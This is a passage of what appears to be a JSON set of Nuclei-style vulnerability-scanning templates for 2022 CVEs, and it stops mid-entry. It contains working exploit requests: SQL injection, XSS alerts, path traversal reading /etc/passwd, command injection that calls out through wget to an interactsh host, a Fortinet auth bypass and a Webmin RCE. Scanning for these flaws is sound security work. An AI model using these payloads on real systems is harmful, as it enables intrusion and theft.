{{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: 